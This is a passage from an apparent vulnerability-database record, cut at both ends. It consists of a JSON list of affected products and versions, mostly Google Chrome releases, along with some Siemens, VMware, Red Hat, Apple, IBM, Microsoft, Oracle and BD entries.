0.3, "vendor": "google", "version": "5.0.351.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.887.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.36" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.793.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.0" }, { "model": "facsvia", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1043.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1000.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.317" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.909.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.14" }, { "model": "simatic ipc477e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.318" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.488.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.526.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.808.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.287.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.584.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1042.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.907.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.29" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.823.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.791.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.577.0" }, { "model": "macos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "10.13.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.91" }, { "model": "simatic ipc347e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.525.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.681.0" }, { "model": "viper lt", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "pyxis procedurestation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.0" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.309" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.97" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1050" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.11" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.950.0" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200840" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.613.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.182.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.163" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.304" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.305" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.464.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.682.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.940.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1683.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.376.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1025" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.921.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.538.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.519.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1041.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.69" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.561.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.586.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.766.0" }, { "model": "simatic ipc677c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.34" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.740.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.830.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.399.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.795.0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.1" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.925.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.864.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.208" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.959.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.27" }, { "model": "servers sw", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x862.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.624.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.639.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1293.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.698.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1079.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.338" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.598.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.30" }, { "model": "simatic ipc377e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.894.0" }, { "model": "virtualization host", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.737.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1061" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.52" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 